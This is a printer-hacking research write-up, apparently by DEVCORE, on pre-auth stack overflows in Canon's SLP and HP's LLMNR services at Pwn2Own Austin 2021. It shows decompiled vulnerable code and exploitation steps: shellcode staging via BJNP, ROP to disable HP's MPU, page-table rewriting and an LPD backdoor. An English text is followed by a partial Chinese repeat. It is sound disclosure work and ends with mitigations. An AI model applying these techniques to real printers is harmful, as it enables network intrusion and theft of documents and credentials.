Why do we want to research Printers ?

Red Team

While doing red team assessment, we found that printers generally appeared in the corporate intranet. There are almost always more than one, but they are usually overlooked and lack of update. It is also an excellent target for red team to hide the action because it is often difficult to detect. It is worth mentioning that larger enterprises are also likely to connect them to AD and become the entry point for confidential information.

Pwn2Own Austin 2021

Another reason is that printers have become one of the main targets of Pwn2Own Mobile. We were also preparing to participate the Pwn2Own stage again, so we decided to start with it.

At first, we thought they were trivial. Like most IoT devices, there are often many command injection vulnerabilities. However, many printers use RTOS instead of Linux systems, which drove our determination to challenge it.

This article will focus on the Canon and HP parts.

Analysis

In the beginning, we read many articles, all of them need to tear down the hardware for analysis and obtaining the debug console. Then they use the memory dumping method to obtain the original firmware. But in the end, we chose another way and didn’t tear down any of the printers.

Canon

Firmware Extract

The initial analysis version is v6.03, we used binwalk to analyze it at the beginning, but the firmware is obfuscated, we can’t analyze it directly.

Obfuscated Canon ImageCLASS MF644Cdw fimware

We also tried “TREASURE CHEST PARTY QUEST: FROM DOOM TO EXPLOIT” by Synacktiv and “Hacking Canon Pixma Printers – Doomed Encryption” by Contextis research. But this time, it’s an entirely different series, and we can’t use the same method to deobfuscate the firmware.

So we started to analyze the obfuscated firmware format and content.

We can see from the obfuscated firmware that the beginning is the Magic NCFW, followed by the size of the firmware, and other parts are obfuscated data.

So we started to think that maybe the old firmware of this printer is not obfuscated until a specific version. If we can get the intermediate version, maybe there is a chance to get the deobfuscation method. The magic header also lets us distinguish whether it is obfuscated.

We can obtain the firmware download URL through the official website or the update packet.

https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDQwMDAwNDc1MjA1&cmp=Z01&lang=EN

After analysis, it can be split into three parts.

We can roughly infer the rules of the download URL. We use this method to download all versions of firmware. The versions we downloaded at that time included:

  • V2.01
  • V4.02
  • V6.03
  • V9.03
  • V10.02

V10.02 is a version that will be released in a few weeks, and you can download it from here first. After downloading all versions, we found that the firmware for this series is obfuscated, and there is no way to deobfuscate it from the previous version.

But we can try downloading Canon’s other series firmware and find out if there is a similar obfuscation algorithm. After all the firmware is downloaded, the total file size is 130 GB. We can find unobfuscated firmware by grepping for NCFW and servicemode.html.

Finally, we found four firmware that meets the conditions. We chose WG7000 series printers to analyze and found the suspected deobfuscation function.

Fortunately, by rewriting this function, the MF644Cdw firmware can be deobfuscated.

After the firmware is extracted, we needed the image base address so that IDA can effectively identify and reference the strings. At first, we find the image base through the common analysis tool rbasefind.

The first base we found was 0x40b0000. But after decompiled it with IDA, most of the function did not correspond to the debug message string.

As shown in the figure above, loc_4489AC08 should point to the string of the function name, but this address is not a regular string. Instead, it is recognized as a code section, and the content is not a string. This indicates that this location is not an actual address. We thought there was a slight offset, but it did not cause big problem for decompiling functions.

How to solve this problem? We first found a function with a known function name and the function name string belonging to it to make adjustments. After finding the offset, we adjusted the image base to the correct address. The final image base found is 0x40affde0. After adjustment, you can see that the original function name can be identified correctly.

Next, we can analyze the firmware typically. After preliminary analysis, we can find out the of Canon ImageCLASS MF644Cdw:

  • OS - DryOSV2
    • Customized RTOS by Canon
  • ARMv7 32bit little-endian
  • Linked with application code into single image
    • Kernel
    • Service

HP

HP’s firmware is relatively easy to obtain. We can use binwalk -Z to obtain the correct firmware. It took about 3-4 days. The other steps, such as finding the image base address, are just the same as Canon. After preliminary analysis, the architecture of HP Color LaserJet Pro MFP M283fdw is as follows:

  • OS
    • RTOS - Modify from ThreadX/Green Hills
  • ARM11 Mixed-endian
    • Code - little-endian
    • Data - Big-endian

Attack Surface

Many services are enabled by default in most printers on the market today.

ServicePortDescription
RUITCP 80/443Web interface
PDLTCP 9100Page Description Language
PJLTCP 9100Printer Job Language
IPPTCP 631Internet Printing Protocol
LPDTCP 515Line Printer Daemon Protocol
SNMPUDP 161Simple Network Management Protocol
SLPTCP 427Service Location Protocol
mDNSUDP 5353Multicast DNS
LLMNRUDP 5355Link-Local Multicast Name Resolution

Usually, RUI (web interface) is opened for facilitate management. The 9100 Port is also commonly used by printers, mainly used to transmit printed data.

Others vary between vendors, but the listed ones are usually present, and most are enabled by default. After evaluating the overall architecture, we focus on service discovery and the DNS series of services. Our long-term experience has often observed that such protocols implemented by manufacturers are often prone to vulnerabilities. The primary services we analyzed were SLP, mDNS, and LLMNR.

Next, we take Pwn2Own Austin 2021 as a case study to see what problems these protocols often have.

Hacking printers at Pwn2Own

Canon

Service Location Protocol

SLP is a service discovery protocol that allows computers and other devices to find services in local area network. In the past, there were many vulnerabilities in EXSI’s SLP. Canon implements the SLP service mainly by themselves. For details about SLP service, please refer to RFC2608.

Before we look into the detail of SLP, we need to talk about the structure of SLP packets.

SLP Packet Structure

Here we only need to pay attention to function-id. This field determines the request type and the format of the payload part. Canon only implements Service Request and Attribute Request.

In the Attribute Request (AttrRqst), the user can obtain the attribute list according to the service and scope. We can specify a scope to look for, such as Canon printers.

Example:

The Attribute Request structure is as follows

It mainly comprises length (Length) and value (Value). Parsing this kind of format should be careful because there are often bugs here. In fact, there is a vulnerability in Canon when paring this format.

Vulnerability

When it parses the scope list, it converts escape characters to ASCII. For example, \41 will be converted to A. But what’s wrong with this simple transformation? Let’s take a look at the pseudocode.

intparse_scope_list(...){chardestbuf[36];unsignedintmax=34;parse_escape_char(...,destbuf,max);}

As shown in the above code, in parse_scope_list, it passes a fixed size buffer destbuf and the maximum size 34 to parse_escape_char. No vulnerability here. Let’s take a look at parse_escape_char.

int__fastcallparse_escape_char(unsigned__int8**pdata,_WORD*pdatalen,unsigned__int8*destbuf,_WORD*max){unsignedintidx;// r7intv7;// r9intv8;// r8interror;// r11unsigned__int8*v10;// r5unsignedinti;// r6intv12;// r1intv13;// r0unsignedintv14;// r1boolv15;// ccintv16;// r2boolv17;// ccunsigned__int8v18;// r0intv19;// r0unsigned__int8v20;// r0unsignedintv21;// r0unsignedintv22;// r0idx=0;v7=0;v8=0;error=0;v10=*pdata;for(i=(unsigned__int16)*pdatalen;i&&!v7;i=(unsigned__int16)(i-1)){v12=*v10;if(v12==','){if(i<2)return-4;v7=1;}else{if(v12=='\\')//----------------------[1]{if(i<3)return-4;v13=v10[1];v14=v13-'0';v15=v13-(unsignedint)'0'>9;if(v13-(unsignedint)'0'>9)v15=v13-(unsignedint)'A'>5;if(v15&&v13-(unsignedint)'a'>5)return-4;v16=v10[2];v17=v16-(unsignedint)'0'>9;if(v16-(unsignedint)'0'>9)v17=v16-(unsignedint)'A'>5;if(v17&&v16-(unsignedint)'a'>5)return-4;if(v14<=9)v18=0x10*v14;elsev18=v13-0x37;if(v14>9)v18*=0x10;*destbuf=v18;//-------------------[2]v19=v10[2];v10+=2;v20=(unsignedint)(v19-0x30)>9?(v19-55)&0xF|*destbuf:*destbuf|(v19-0x30)&0xF;*destbuf=v20;LOWORD(i)=i-2;if(!strchr((int)"(),\\!<=>~;*+",*destbuf)){v21=*destbuf;if(v21>0x1F&&v21!=0x7F)return-4;}gotoLABEL_40;}if(strchr((int)"(),\\!<=>~;*+",v12))//-----------------------[3]return-4;v22=*v10;if(v22<=0x1F||v22==0x7F)return-4;if(v22!=''){v8=0;gotoLABEL_35;}if(!v8){v8=1;LABEL_35:if((unsigned__int16)*max<=idx)//----------------------[4] {error=1;gotonext_one;}if(v8)LOBYTE(v22)=32;*destbuf=v22;LABEL_40:++destbuf;idx=(unsigned__int16)(idx+1);}}next_one:++v10;}if(error){*max=0;debugprintff(3645,4,"Scope longer than buffer provided");LABEL_48:*pdata=v10;*pdatalen=i;return0;}if(idx){*max=idx;gotoLABEL_48;}return-4;}

You can see that [3] is a case that handles no escape characters. It checks whether the length exceeds the maximum[4]. However, in case [1] handling escape characters, there is no length check, and the converted result is directly copied to the destination buffer [2].

Once given a long escape characters string, it leads to a stack overflow.

After finding the vulnerability, the first thing is to see what protection it has to decide on the exploit plan. But after analysis, we found that the Canon printer does not have any memory-related protection.

Protection

  • No Stack Guard
  • No DEP
  • No ASLR

No Stack Guard, no DEP and no ASLR, hacker friendly ! Like back to the 90s, just a stack overflow can control the world. Next, like the past stack overflow exploit method, we just need to find a fixed address to store the shellcode, overwrite the return address, and jump to the shellcode. Eventually, we found the BJNP service to store our shellcode.

BJNP

BJNP is also a service discovery protocol designed by Canon, and there have been many vulnerabilities in the past. Synacktiv has also exploited Pixma MX925 through this protocol. For more details, please refer to here. BJNP stores the controllable session data in the global buffer. We can use this function to put our shellcode in a fixed location without strict restrictions.

Exploitation Step

  • Use BJNP to store our shellcode on a global buffer
  • Trigger stack overflow in SLP and overwrite return address
  • Return to the global buffer

Pwn2Own Austin 2021

Generally, the Pwn2Own organizer(ZDI) requests participants to prove that we have pwned the target. The presentation method here is up to players. Initially, we wanted to print the logo directly on the LCD screen as we exploited the Lexmark printer.

However, we spent a lot of time figuring out how to print the image on the screen, which was longer than finding vulnerabilities and writing exploits. In the end, a safer approach was adopted because of the time constraints, directly changing the Service Mode string and printing it on the screen.

In fact, it is not that difficult to print the image on the screen. Other teams have found methods. Those who are interested can try it out :)

Debug

Some people may wonder how to debug in this environment. There are usually several ways to debug:

  • Teardown the printer and get debug console.
  • Use an old exploit to install customized debugger

However, we have updated to the latest version at that time. There is no known vulnerability in this version, so we need to downgrade the version back. Tearing down the hardware also takes additional time and cost. But we already had a vulnerability at that time, it was not cost-effective to tear down the hardware or downgrade. Finally, we still used the most traditional sleep debug method.

After ROP or executing shellcode, print the result to a web page or other visible place, then call sleep. We can read the result from the web page and finally restart the machine to repeat this process.

Next, let’s talk about HP printers.

HP

LLMNR is very similar to mDNS. It provides base name resolution on the same local link. But it is more straightforward than mDNS and usually also cooperates with some service discovery protocols. Here is a brief introduction to this mechanism:

In the domain name resolution of the local area network, Client A will first use multicast to find the location of Client C in the local area network.

After Client C receives, Client C sends it back to Client A, which implements the link-local domain name resolution.

LLMNR is mainly based on the DNS packet format, and the format is as follows:

The main format is the header followed by Queries, and Count represents the number of queries of different types.

Each DNS Query is composed of many labels, and each label will comprise length and string, as shown in the figure above. There is also a Message Compression mechanism. Dealing with these is very prone to vulnerabilities. “THE COST OF COMPLEXITY: Different Vulnerabilities While Implementing the Same RFC” at BlackHat 2021 also mentions similar problems.

Vulnerability

Let’s look at HP’s implementation:

int llmnr_process_query(...){
    char result[292];
    consume_labels(llmnr_packet->qname,result,...);
    ...
}

Here you can see that when HP processes LLMNR packets, it passes a fixed size buffer to consume_lables. consume_lables is used to process DNS labels, and the fixed buffer is used to store the results.

int __fastcall consume_labels(char *src, char *dst, llmnr_hdr *a3)
{
  int v3; // r5
  int v4; // r12
  unsigned int len; // r3
  int v6; // r4
  char v7; // r6
  bool v8; // cc
  int v9; // r0
  unsigned __int8 chr; // r6
  int result; // r0

  v3 = 0;
  v4 = 0;
  len = 0;
  v6 = 0;
  while ( 1 )
  {
    chr = src[v3]; //-------------[1]
    if ( !chr )
      break;
    if ( (int)len <= 0 )
    {
      v8 = chr <= 0xC0u;
      if ( chr == 0xC0 )
      {
        v9 = src[v3 + 1];
        v6 = 1;
        v3 = 0;
        src = (char *)a3 + v9;
      }
      else
      {
        len = src[v3++];
        v8 = v4 <= 0;
      }
      if ( !v8 )
        dst[v4++] = '.';
    }
    else
    {
      v7 = src[v3++];
      len = (char)(len - 1);
      dst[v4++] = v7; //----------[2]
    }
  }
  result = v3 + 1;
  dst[v4] = 0;
  if ( v6 )
    return 2;
  return result;
}

We can see that [1] will get the label length and then process it according to the type. [2] is used as a case of length. There is no length check here, and the label is directly written into the dst buffer, leading to stack overflow. At this point, we thought we could exploit it in the similar way as Canon. However, when we were writing the exploit, we found that HP printers have more protection mechanisms.

Protection

  • No Stack Guard
  • XN(DEP)
  • Memory Protect Unit (MPU)
  • No ASLR

In this case, XN and MPU memory protection mechanisms are enabled, and this vulnerability has more restrictions. We can only overflow about 0x100 bytes without null byte, which significantly restricts our ROP and makes it more challenging. We need to find other vulnerabilities or methods to achieve our goal.

After a while, we started thinking about how HP printers implement XN(DEP) and MPU. Let’s review HP RTOS:

  • Linked with application code into single image
  • Many tasks run
    • in the same virtual address space
    • in kernel-mode

After reviewing, we thought, can we bypass it by understanding the MMU and MPU in HP RTOS?

MMU in HP M283fdw

HP M283fdw uses one-level page table translation and each translation table entry for translating a 1MB section. The translation table is located at 0x4003c000.

Each translation table entry corresponds to a physical address and the permissions of the section. The CPU determines whether it can be executed or modified according to the entry. The permissions related here are AP, APX, and XN. We can also map any physical address through this translation table entry.

Generally, we can modify the translation table entry through ROP if we have stack overflow under high privileges. But when we tried to write directly to the translation table, the HP printer crashed.

We checked and found that the leading cause of the memory fault exception is that Memory Protection Unit(MPU) protects the translation table.

MPU in HP M283fdw

The MPU enables you to partition memory into regions and set individual protection attributes for each regions. It is an entirely different mechanism from MMU and is often found in IoT devices. HP enables MPU at boot and defines permissions for each region, so we cannot manipulate the page table.

After a long time of reverse engineering and referencing the ARM Manual, we found that the MPU can be turned off by clearing MPU_CTRL. We found that the location is 0xE0400304, slightly different from ARM’s spec.

Exploitation

After understanding HP’s MMU and MPU mechanism, we can easily use ROP to turn off the MPU and successfully modify the translation table entry. We can arbitrarily modify the code of any service, and we finally chose Line Printer Daemon(LPD). We modified it into a backdoor, read more payloads to the specified location, and finally executed the shellcode.

But there is one thing that must be mentioned. After the translation table entry and LPD code are overwritten, be sure to flush TLB and invalidate I-cache and D-cache. Otherwise, it is very likely to execute in the old one, causing the exploit to fail.

Flash TLB

flush_tlb:
    mov r12, #0
    mcr p15, 0, r12, c8, c7, 0

Invalidate I-cache

disable_icache:
    mrc p15, 0, r1, c1, c0, 0
    bic r1, r1, #(1 << 12)
    mcr p15, 0, r1, c1, c0, 0

Exploitation Step

  • Trigger stack overflow in LLMNR and overwrite return address
  • Use limited ROP to
    • disable MPU
    • modify translation table entry and get read-write execute permission
    • flush TLB
    • modify the code of LPD
    • invalidate I-cache and D-cache
  • Use modified LPD to read our shellcode and jump to shellcode

Pwn2Own Austin 2021

When we could execute the shellcode, we only had one week left, and we finally chose to use the exact string to display Pwned by DEVCORE on the LCD.

After that, we also tried to change the backdoor to the debug console to facilitate many functions, such as viewing memory information, playing music, etc.

F-Secure Labs used the function of playing music to present it at that time. It is fascinating. You can go here to look at the situation at the Pwn2Own.

Result

In Pwn2Own Austin 2021, we got 2nd place after pwning other devices and printers. We had a good experience and learned some new things.

Mitigation

Update

The first is to update regularly. All the printers mentioned have been patched. It is often ignored. We usually find printers lack of update for several years and even leave the default password directly in the corporate intranet.

Disable unused service

Another mitigation is to turn off services that are not in use as much as possible. Most printers default enable too many services that are usually unused. We even think that you can turn off the discovery service, just open the service you want to use.

Firewall

It would be better if you could apply a firewall. Most printers provide related functions.

Summary

With code execution on the printers, in addition to printing things on the LCD, we can use the printer to steal confidential information, whether it is confidential documents or some credential. We can also use the printer for lateral movement, and because it is hard to detect, making it an excellent target for the red team.

By the way, the protocols of the discovery service series on many printers are often vulnerable. If you want to find vulnerabilities in printers or other IoT devices, you can look in this direction.

To Be Continue

We also found several vulnerabilities in the printer series at Pwn2Own Toronto 2022 last year. We will be releasing detailed information soon, so stay tuned for Part II.

Reference

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part I

$
0
0

印表機近年來已成為企業內網中不可或缺的設備之一,功能也隨著科技的發展日益增多,除了一般的傳真及列印之外,也開始支援 AirPrint 等雲端列印服務,讓列印更加方便,直接使用行動裝置就可以輕鬆列印,更成為了 IoT 中,不可或缺的一環,正因為其便利,也常被用於列印公司內部機敏文件,使得在企業中印表機的安全性更加的重要。

而前年我們也在 Canon 及 HP 的印表機中發現了 Pre-auth RCE 的漏洞(CVE-2022-24673CVE-2022-3942) 及 Lexmark 發現漏洞(CVE-2021-44734),並在 Pwn2Own Austin 2021 中取得了 Canon ImageCLASS MF644Cdw、 HP Color LaserJet Pro MFP M283fdw 及 Lexmark MC3224i 的控制權,而成功獲得 Pwn2Own 中駭客大師(Master of Pwn) 的點數,這篇研究將講述 Canon 及 HP 漏洞的細節及我們的利用方式。

此份研究亦發表於 HITCON 2022CODE BLUE 2022,你可以從這裡取得投影片!

Printer

早期在使用印表機時,往往會需要使用 IEEE1284 或是 USB 的 Printer cable 來將印表機接上電腦,並且在使用時會額外裝上廠商所附的驅動程式。而現今的印表機已可以接上網路,並多了各式各樣的功能,通常只要將印表機接上區網,區網中的電腦就可以輕易地發現你所新安裝的印表機。

目前市面上的印表機預設都開了非常多的服務,不外乎就是為了讓列印更加方便,像是 FTP、AirPrint、Bonjour 等等服務。

Motivation

為何要研究印表機呢?

紅隊內網需求

過去我們團隊在執行紅隊演練過程中,印表機普遍出現於現代企業內網中,幾乎都會有一台以上,但往往是被忽略的一塊,也常常沒在更新。印表機本身也非常適合作為攻擊者的藏身處,通常很難被偵測出來。值得一提的是比較大型的企業也很有可能將其接上 AD,成為獲取機密資訊的入口。

Pwn2Own Austin 2021

另外一點是印表機在 2021 時,首次成為了 Pwn2Own Mobile 主要推動的目標之一,而我們剛好當時也準備再次挑戰 Pwn2Own 舞台,便決定一探究竟。

起初我們原本以為非常簡單,跟多數的 IoT 設備一樣,能輕易的找到 Command injection 問題,殊不知有不少印表機都是使用 RTOS,並非一般的 Linux 系統,但這更是驅動了我們挑戰它的決心。

本篇將會著重在較為精彩的 Canon 及 HP 部分,Lexmark 有機會再談談。

Analysis

剛開始研究的時候,我們參考了許多資料都是需要拆解硬體來分析,才能獲得 debug console,再用 dump memory 方式來獲取原始的 firmware。但最終我們採用了其他的方式,並沒有拆解任何一台印表機。

Canon

Firmware Extract

初始分析版本為 v6.03,我們一開始使用 binwalk去解析它,但 firmware 是經過混淆的,我們並沒辦法直接解開。

圖: 經過混淆的 Canon ImageCLASS MF644Cdw fimware

我們這邊也嘗試過了 TREASURE CHEST PARTY QUEST: FROM DOOM TO EXPLOIT by Synacktiv 及 Hacking Canon Pixma Printers – Doomed Encryption by Contextis Research 的研究,但這次是完全不同的系列,我們無法使用同樣的方法解開混淆過的 firmware。

於是我們開始分析混淆過的 firmware 格式及內容。

我們大致上可以從混淆過的 firmware 看到,每個混淆過的 firmware 的開頭都會是 NCFW 這個 Magic,並帶有該 firmware 大小,而其他部分則是混淆過的資料。

於是我們開始猜想,也許這台印表機舊版本的 firmware 沒有混淆,直到某一版才開始混淆,如果可以抓到中介版本,可能有機會獲得解混淆的方法。而這個 Magic 也可以讓我們辨別是不是經過混淆的。

以下這個網址是透過官網或是擷取封包獲得的 firmware 下載網址

https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDQwMDAwNDc1MjA1&cmp=Z01&lang=EN

經過分析後,可以拆分為多個部分

約略可以歸納出下載網址的規則,我們可以藉由這個方法來載到所有版本的 firmware,當時我們載到的版本有

  • V2.01
  • V4.02
  • V6.03
  • V9.03
  • V10.02

而 v10.02 是幾周後會釋出的版本,可以先從這邊優先載到。載完所有版本後,我們發現該系列版本的 firmware 都是經過混淆的,無法從先前版本獲得解混淆的方法。但我們可以下載 Canon 其他系列的印表機,嘗試找找是否有類似的混淆演算法。載完約有 130 GB 大小。透過 grep 找 NCFWservicemode.html可以找到未混淆的 firmware。

最後找到四組符合條件的 firmware,我們這邊選擇了 WG7000 系列的印表機來分析,並找到了疑似解混淆的函式。

很幸運的,藉由重寫這個函式,可以解出明文的 MF644Cdw firmware。

在解出 firmware 之後,必須找出 firmware 的 image base address,IDA 才能有效地辨別跟 reference。此處可透過常見的分析工具 rbasefind來找 image base。

一開始找出的 base 為 0x40b0000,但丟進 IDA 後,卻發現大部分的函式debug message的字串對映不起來。

如上圖所示,loc_4489AC08應該指向函式名稱的字串,然而此地址卻不是正常的字串,而是被當成 code 區段,內容也不是字串,表示此位置並非真正位置,而是有些許的偏移,但正常 function 的解析沒甚麼太大問題。這邊可以先找一個已知函式名稱的函式和找到屬於他的函式名稱字串來做調整,找到其中差異的 offset 後,將 image base 調到正確位置就可以了。最終找到的 image base 為 0x40affde0。調整完後,可看到原本的函式已可正確識別函式名稱。

接下來就可以正常分析 firmware,而初步分析後可得知,Canon ImageCLASS MF644Cdw 架構如下

  • OS - DryOSV2
    • Customized RTOS by Canon
  • ARMv7 32bit little-endian
  • Linked with application code into single image
    • Kernel
    • Service

HP

HP 的 firmware 取得相對容易許多,我們可以透過 binwalk -Z來獲得正確的 firmware,約略需要花 3-4 天左右的時間,而其他找 image base address 等步驟,則與 Canon 相同,此處就不贅述。經過初步分析後,HP Color LaserJet Pro MFP M283fdw 架構如下

  • OS
    • RTOS - Modify from ThreadX/Green Hills
  • ARM11 Mixed-endian
    • Code - little-endian
    • Data - Big-endian

Attack Surface

在現今市面上大多數的多功能事務機中,預設都會開啟一堆服務

ServicePortDescription
RUITCP 80/443Web interface
PDLTCP 9100Page Description Language
PJLTCP 9100Printer Job Language
IPPTCP 631Internet Printing Protocol
LPDTCP 515Line Printer Daemon Protocol
SNMPUDP 161Simple Network Management Protocol
SLPTCP 427Service Location Protocol
mDNSUDP 5353Multicast DNS
LLMNRUDP 5355Link-Local Multicast Name Resolution

一般來說,為了方便管理,通常都會開 RUI (web 介面) ,再來是 9100 Port 也是印表機常使用的 Port,主要會用來傳輸列印的資料。其他部分則會依照廠商不同而有所不同,不過上述所列的服務通常都會有,且預設大部分都是開啟的。在評估過這些服務後,決定注重在發現服務及 DNS 系列的協定,因為我們的長期經驗下來,常常觀察到 vendor 在開發這些服務時,往往是自行開發實作,而不是使用存在已久的 Open Source。但實際上來說,實作這些協定很容易出現問題的。我們當時主要分析的服務主要有 SLPmDNSLLMNR

接下來就以 Pwn2Own Austin 2021 作為 Case Study,來看看這些協定常會有哪些問題。

Hacking printers at Pwn2Own

Canon

Service Location Protocol

SLP 是一種服務發現協定,主要用於讓電腦快速找到印表機,過去在 ESXI 中,SLP 也常常出問題,而在 Canon 的 SLP 服務,主要由 Canon 自己實作,SLP 服務細節可參考 RFC2608。在我們分析 SLP 前必須先了解 SLP 封包大致上的結構

圖: SLP Packet Structure

這邊只需要關注function-id,此欄位會決定請求型態,也會決定 payload 部分的格式。而 Canon 只有實作 Service Request 及 Attribute Request 兩種。

在 Attribute Request (AttrRqst) 的請求中,允許使用者可以根據 service 及 scope 來獲得 attribute list。 scope 可以定義要找的範圍,如 canon 印表機。

Example:

而 Attribute request 結構大致如下

主要是長度(Length)及數值(Value)的組合,通常在 Parse 這種格式,很容易出問題,需要特別注意,而實際上 Canon 在 Parse 這個結構時就出了問題。

Vulnerability

Canon 在 parse scope list 時,會將跳脫字元轉換成 ASCII,例如 \41會轉換成 A,然而這個簡單轉換會有怎樣的問題呢? 我們來看一下 Pseudo code

intparse_scope_list(...){chardestbuf[36];unsignedintmax=34;parse_escape_char(...,destbuf,max);}

如上面程式碼所示,在 parse_scope_list中,會先分配 36 bytes 的 destbuf並且指定最大大小 34 到 parse_escape_char中,這邊沒甚麼問題,讓我們來看一下 parse_escape_char

int__fastcallparse_escape_char(unsigned__int8**pdata,_WORD*pdatalen,unsigned__int8*destbuf,_WORD*max){unsignedintidx;// r7intv7;// r9intv8;// r8interror;// r11unsigned__int8*v10;// r5unsignedinti;// r6intv12;// r1intv13;// r0unsignedintv14;// r1boolv15;// ccintv16;// r2boolv17;// ccunsigned__int8v18;// r0intv19;// r0unsigned__int8v20;// r0unsignedintv21;// r0unsignedintv22;// r0idx=0;v7=0;v8=0;error=0;v10=*pdata;for(i=(unsigned__int16)*pdatalen;i&&!v7;i=(unsigned__int16)(i-1)){v12=*v10;if(v12==','){if(i<2)return-4;v7=1;}else{if(v12=='\\')//----------------------[1]{if(i<3)return-4;v13=v10[1];v14=v13-'0';v15=v13-(unsignedint)'0'>9;if(v13-(unsignedint)'0'>9)v15=v13-(unsignedint)'A'>5;if(v15&&v13-(unsignedint)'a'>5)return-4;v16=v10[2];v17=v16-(unsignedint)'0'>9;if(v16-(unsignedint)'0'>9)v17=v16-(unsignedint)'A'>5;if(v17&&v16-(unsignedint)'a'>5)return-4;if(v14<=9)v18=0x10*v14;elsev18=v13-0x37;if(v14>9)v18*=0x10;*destbuf=v18;//-------------------[2]v19=v10[2];v10+=2;v20=(unsignedint)(v19-0x30)>9?(v19-55)&0xF|*destbuf:*destbuf|(v19-0x30)&0xF;*destbuf=v20;LOWORD(i)=i-2;if(!strchr((int)"(),\\!<=>~;*+",*destbuf)){v21=*destbuf;if(v21>0x1F&&v21!=0x7F)return-4;}gotoLABEL_40;}if(strchr((int)"(),\\!<=>~;*+",v12))//-----------------------[3]return-4;v22=*v10;if(v22<=0x1F||v22==0x7F)return-4;if(v22!=''){v8=0;gotoLABEL_35;}if(!v8){v8=1;LABEL_35:if((unsigned__int16)*max<=idx)//----------------------[4] {error=1;gotonext_one;}if(v8)LOBYTE(v22)=32;*destbuf=v22;LABEL_40:++destbuf;idx=(unsigned__int16)(idx+1);}}next_one:++v10;}if(error){*max=0;debugprintff(3645,4,"Scope longer than buffer provided");LABEL_48:*pdata=v10;*pdatalen=i;return0;}if(idx){*max=idx;gotoLABEL_48;}return-4;}

可以看到 [3]針對是沒有跳脫字元的處理,會在 [4]檢查是否有超過最大長度,然而在有跳脫字元的處理中 [1],並沒有任何對長度的檢查,直接將轉換後的結果放到 destatation buffer 中 [2],一旦給定的字串多數為跳脫字元的情況,就會造成 stack overflow。

在找到漏洞之後,第一件事就是先看看本身有甚麼保護,方便後續的利用。但分析了一下發現,Canon 印表機本身並沒有任何記憶體相關的保護。

Protection

  • No Stack Guard
  • No DEP
  • No ASLR

沒有 Stack Guard、沒有 DEP 也沒有 ASLR,可以說是 hack friendly ! 如同回到 90 年代,一個 stack overflow 就可以打天下。接下來就如同過往的 Binary Exploitation 利用手法,找個地方放 shellcode 再覆蓋 return address 跳到 shellcode 就會有任意程式碼執行了! 最終我們找到了 BJNP 這個服務來放我們的 shellcode。

BJNP

BJNP 本身也是個服務發現協定,由 Canon 自己所設計,過去也曾經有許多漏洞,Synacktiv也曾經利用該協定漏洞來獲得印表機控制權,這邊不多做細節上的介紹,更多細節可參考這篇,我們也用了類似的手法。 BJNP 本身會將可控的 session 資料放在已知的 global buffer 中,我們可用這個功能來將我們的 shellcode 放到一個固定的位置上,基本上也沒甚麼限制。

我們重新整理一下利用步驟

Exploitation Step

  • 使用 BJNP 將我們的 shellcode 放到固定的已知位置。
  • 觸發 SLP 的 stack overflow 並覆蓋 return address
  • 跳到我們的 shellcode 上執行程式碼。

Pwn2Own Austin 2021

通常 Pwn2Own 中會需要你證明已打下印表機,這邊可以自由選擇呈現方式,我們起初想要的是如同我們 exploit Lexmark 印表機一樣,直接將 logo 放到印表機的 LCD 螢幕上。

但在比賽前,我們花了很多時間在研究該怎麼把 logo 印到螢幕上,花在這邊時間可能比找洞跟寫 exploit 時間還要長,最後也因為時間上的因素,採取了比較保險的做法,直接改掉 Service Mode字串,再印到螢幕上。

不過實際上印圖片到螢幕上並不難,其他隊伍有找到方法,有興趣的人可以嘗試看看。

Debug

看到這邊可能會有人想問這種環境如何 debug,實際上來說要 debug 通常有幾種方法:

  • 接上硬體獲得 debug console 後,用裡面的功能來 debug
  • 用舊的洞獲得程式碼執行後,裝上客製的 debugger

不過我們當時已更新到最新,該版本不存在舊的漏洞,需要降版本回去,而拆解硬體同樣也須額外的時間,但當時我們已經有漏洞了,時間上來說不太合成本。最後我們還是採用最傳統的 sleep debug 法去 debug。

在 ROP 或執行 shellcode 後,將結果印到網頁或其他可見的地方,然後呼叫 sleep 後,就可從網頁或其他讀出結果,最後再重開機,接下來就是不斷重複此流程。不過實際上更好的做法還是接上 debug console 會方便一點。

接下來講講 HP 印表機

HP

LLMNR是與 mDNS 非常相似的一個協定,提供了區網中的域名解析功能,但比 mDNS 更單純一點,通常也會配合一些服務發現協定。這邊簡單介紹此機制:

在區網域名解析時,Client A 會先用 multicast 方式,尋找區網中 Client C 位置

在 Client C 接收到之後,則會回傳給 Client A,簡單實現了區網域名的解析

而基本上 LLMNR 大多建立在 DNS 封包格式上,格式如下:

主要會是 header 加上 Queries 這種格式,Count 表示不同型態的 query 數。

而每個 DNS Query 都是由許多 label 組成,每個 label 都會像上圖中這樣,都是長度加上字串的組合,也有 Message Compression機制,過去在處理這些地方時,非常容易出現問題,在 BlackHat 2021 的 THE COST OF COMPLEXITY:Different Vulnerabilities While Implementing the Same RFC中,也提到了類似的問題。

Vulnerability

我們回頭來看一下 HP 的實作:

intllmnr_process_query(...){charresult[292];consume_labels(llmnr_packet->qname,result,...);...}

這邊可以看到 HP 在處理 LLMNR 封包時,會將一個固定 buffer 傳入,用來放處理後的結果,而 consume_lables 則是主要用來處理 dns labels。

int__fastcallconsume_labels(char*src,char*dst,llmnr_hdr*a3){intv3;// r5intv4;// r12unsignedintlen;// r3intv6;// r4charv7;// r6boolv8;// ccintv9;// r0unsigned__int8chr;// r6intresult;// r0v3=0;v4=0;len=0;v6=0;while(1){chr=src[v3];//-------------[1]if(!chr)break;if((int)len<=0){v8=chr<=0xC0u;if(chr==0xC0){v9=src[v3+1];v6=1;v3=0;src=(char*)a3+v9;}else{len=src[v3++];v8=v4<=0;}if(!v8)dst[v4++]='.';}else{v7=src[v3++];len=(char)(len-1);dst[v4++]=v7;//----------[2]}}result=v3+1;dst[v4]=0;if(v6)return2;returnresult;}

而在 consume_labels 中的 [1]會先取得 label 長度,接著根據型態去處理,而在[2]則是處理一般長度的情況,此處並沒有對長度做檢查,就直接將 label 寫進 dst buffer 中,導致了 stack overflow,到此處我們原以為差不多結束了,接下來應該如同 Canon 類似的方法就可以 Exploit 了。然而當我們在寫 Exploit 時發現 HP 比 Canon 多了一些保護機制。

Protection

  • No Stack Guard
  • XN(DEP)
  • Memory Protect Unit (MPU)
  • No ASLR

